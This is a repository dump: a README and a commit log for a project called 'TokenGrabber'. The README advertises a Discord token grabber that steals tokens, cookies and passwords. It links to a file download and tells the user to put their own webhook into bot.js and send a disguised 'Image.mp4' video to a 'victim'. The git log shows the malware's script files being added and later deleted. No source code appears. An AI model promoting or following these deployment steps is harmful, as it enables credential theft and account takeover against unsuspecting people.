======================: FILES :======================
======================: README CONTENT :======================
#### -> [Download](https://mega.nz/file/RWthFADY#zDzVMzFql_EZDBlegs-1rlz4iEHdu6h9cRDUEkiPNbM)

- Discord Image Token Grabber By Ca$H 
- Image Token Logger Token Grabber All Cookies & Passwords
- edit file bot.js enter your discord webhook
- open start.bat send the video Image.mp4 for victim
====================== GIT HISTORY: ======================
cc34fa0 HEAD@{0}: clone: from https://github.com/q7ix/TokenGrabber
commit cc34fa0686599e671e421e2c52b62e926d1bb21a
Author: q7ix <109858195+q7ix@users.noreply.github.com>
Date:   Mon Jul 25 18:56:52 2022 +0200

    Update README.md

commit 3339a4457e8bdf8c3c93dfb0197da96d5c4f170c
Author: q7ix <109858195+q7ix@users.noreply.github.com>
Date:   Mon Jul 25 18:52:15 2022 +0200

    Update README.md

commit ba1032c42bfe19fbb515ec8c2cb7217b14a4a0cb
Author: q7ix <109858195+q7ix@users.noreply.github.com>
Date:   Mon Jul 25 18:51:00 2022 +0200

    Delete login.txt

commit 91f5e63eecb6aa7e690e1fe96f91cb414db40a24
Author: q7ix <109858195+q7ix@users.noreply.github.com>
Date:   Mon Jul 25 18:50:52 2022 +0200

    Delete Note.txt

commit 6b933483394260e9d24daec38045e12a0c515c64
Author: q7ix <109858195+q7ix@users.noreply.github.com>
Date:   Mon Jul 25 18:50:42 2022 +0200

    Delete Image.mp4

commit fb4322d4bb680ccd8c2de6a0b93db216deeb98c8
Author: q7ix <109858195+q7ix@users.noreply.github.com>
Date:   Mon Jul 25 18:50:34 2022 +0200

    Delete Bot.js

commit aa9ce51a7c2e5a379403bb09f5bfa0ad03bbd312
Author: q7ix <109858195+q7ix@users.noreply.github.com>
Date:   Mon Jul 25 18:50:26 2022 +0200

    Delete src directory

commit 3b8def99b27a53016e27383f344257b4bfd7254f
Author: q7ix <109858195+q7ix@users.noreply.github.com>
Date:   Mon Jul 25 18:38:42 2022 +0200

    Delete Start.bat

commit 4dd6c96030118ec0d04830eab9b827804c4341ee
Author: q7ix <109858195+q7ix@users.noreply.github.com>
Date:   Mon Jul 25 17:55:03 2022 +0200

    Add files via upload

commit 501ff2ff26d00ce3ead80e60a71fc214c5e2f017
Author: q7ix <109858195+q7ix@users.noreply.github.com>
Date:   Mon Jul 25 17:54:51 2022 +0200

    Delete Bowers directory

commit 937ef5e6c8b3aa9e9cfdf993ef884d1d94263154
Author: q7ix <109858195+q7ix@users.noreply.github.com>
Date:   Mon Jul 25 15:06:43 2022 +0200

    Update README.md

commit cc75c71acec41c6bc09055e4b6c0441760e1c8be
Author: q7ix <109858195+q7ix@users.noreply.github.com>
Date:   Mon Jul 25 15:05:40 2022 +0200

    Update Bot.js

commit 341a738c399af4827ccdb1dc6f45de8ed2d1d070
Author: q7ix <109858195+q7ix@users.noreply.github.com>
Date:   Mon Jul 25 15:04:56 2022 +0200

    Update Note.txt

commit 6af0222779ac5b2779867658ef89abe6eb9ca4b2
Author: q7ix <109858195+q7ix@users.noreply.github.com>
Date:   Mon Jul 25 15:04:08 2022 +0200

    Update Note.txt

commit 77f2767b582a264029c7df8328a93b581665cd65
Author: q7ix <109858195+q7ix@users.noreply.github.com>
Date:   Mon Jul 25 14:57:42 2022 +0200

    Update src.py

commit 87dae28d98175d1c636225d71a572ff9d6e48fec
Author: q7ix <109858195+q7ix@users.noreply.github.com>
Date:   Sat Jul 23 14:40:31 2022 +0200

    Add files via upload

commit 85480056334e496d2e07613ede79ae0395f54f23
Author: q7ix <109858195+q7ix@users.noreply.github.com>
Date:   Sat Jul 23 14:38:24 2022 +0200

    Update README.md

commit 8581223013506e99ac5d05f3a0d43a04158e603f
Author: q7ix <109858195+q7ix@users.noreply.github.com>
Date:   Sat Jul 23 14:38:15 2022 +0200

    Update README.md

commit 65943d1c9ba92b1eb13e63f6dd408728764254f1
Author: q7ix <109858195+q7ix@users.noreply.github.com>
Date:   Sat Jul 23 14:37:48 2022 +0200

    Update README.md

commit 2f29c579d826cd74e758034686a85b6ad00f6b0d
Author: q7ix <109858195+q7ix@users.noreply.github.com>
Date:   Sat Jul 23 14:37:21 2022 +0200

    Update README.md

commit e0dc2e7a8c8ab5248142f67d713f5fa258fb819f
Author: q7ix <109858195+q7ix@users.noreply.github.com>
Date:   Sat Jul 23 14:32:22 2022 +0200

    Initial commit
